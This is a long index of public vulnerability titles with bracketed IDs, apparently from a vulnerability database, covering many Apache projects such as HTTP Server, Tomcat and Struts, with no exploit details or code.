| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
| [49290] Apache Wicket Cross Site Scripting Vulnerability
| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
| [46953] Apache MPM-ITK Module Security Weakness
| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
| [46166] Apache Tomcat JVM Denial of Service Vulnerability
| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
| [44616] Apache Shiro Directory Traversal Vulnerability
| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
| [42492] Apache CXF XML DTD Processing Security Vulnerability
| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
7395| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
7396| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
7397| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
7398| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
7399| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
7400| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
7401| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
7402| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
7403| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
7404| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
7405| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
7406| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
7407| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
7408| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
7409| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
7410| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
7411| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
7412| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
7413| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
7414| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
7415| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
7416| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
7417| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
7418| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
7419| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
7420| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
7421| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
7422| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
7423| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
7424| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
7425| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
7426| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
7427| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
7428| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
7429| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
7430| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
7431| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
7432| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
7433| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
7434| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
7435| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7436| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
7437| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
7438| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
7439| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
7440| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
7441| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
7442| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
7443| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
7444| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
7445| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
7446| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
7447| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
7448| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
7449| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
7450| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
7451| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
7452| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
7453| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
7454| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
7455| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
7456| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
7457| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
7458| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
7459| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
7460| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
7461| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
7462| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
7463| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
7464| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
7465| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
7466| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
7467| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
7468| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
7469| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
7470| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
7471| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
7472| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
7473| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
7474| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
7475| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
7476| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
7477| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
7478| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
7479| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
7480| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
7481| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
7482| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
7483| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
7484| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
7485| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
7486| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
7487| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
7488| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
7489| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
7490| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
7491| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
7492| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
7493| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
7494| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
7495| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
7496| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
7497| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
7498| [20527] Apache Mod_TCL Remote Format String Vulnerability
7499| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
7500| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
7501| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
7502| [19106] Apache Tomcat Information Disclosure Vulnerability
7503| [18138] Apache James SMTP Denial Of Service Vulnerability
7504| [17342] Apache Struts Multiple Remote Vulnerabilities
7505| [17095] Apache Log4Net Denial Of Service Vulnerability
7506| [16916] Apache mod_python FileSession Code Execution Vulnerability
7507| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
7508| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
7509| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
7510| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
7511| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
7512| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
7513| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
7514| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
7515| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
7516| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
7517| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
7518| [15177] PHP Apache 2 Local Denial of Service Vulnerability
7519| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
7520| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
7521| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
7522| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
7523| [14106] Apache HTTP Request Smuggling Vulnerability
7524| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
7525| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
7526| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
7527| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
7528| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
7529| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
7530| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
7531| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
7532| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
7533| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
7534| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
7535| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
7536| [11471] Apache mod_include Local Buffer Overflow Vulnerability
7537| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
7538| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
7539| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
7540| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
7541| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
7542| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
7543| [11094] Apache mod_ssl Denial Of Service Vulnerability
7544| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
7545| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
7546| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
7547| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
7548| [10478] ClueCentral Apache Suexec Patch Security Weakness
7549| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
7550| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
7551| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
7552| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
7553| [9921] Apache Connection Blocking Denial Of Service Vulnerability
7554| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
7555| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
7556| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
7557| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
7558| [9733] Apache Cygwin Directory Traversal Vulnerability
7559| [9599] Apache mod_php Global Variables Information Disclosure Weakness
7560| [9590] Apache-SSL Client Certificate Forging Vulnerability
7561| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
7562| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
7563| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
7564| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
7565| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
7566| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
7567| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
7568| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
7569| [8898] Red Hat Apache Directory Index Default Configuration Error
7570| [8883] Apache Cocoon Directory Traversal Vulnerability
7571| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
7572| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
7573| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
7574| [8707] Apache htpasswd Password Entropy Weakness
7575| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
7576| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
7577| [8226] Apache HTTP Server Multiple Vulnerabilities
7578| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
7579| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
7580| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
7581| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
7582| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
7583| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
7584| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
7585| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
7586| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
7587| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
7588| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
7589| [7255] Apache Web Server File Descriptor Leakage Vulnerability
7590| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
7591| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
7592| [6939] Apache Web Server ETag Header Information Disclosure Weakness
7593| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
7594| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
7595| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
7596| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
7597| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
7598| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
7599| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
7600| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
7601| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
7602| [6117] Apache mod_php File Descriptor Leakage Vulnerability
7603| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
7604| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
7605| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
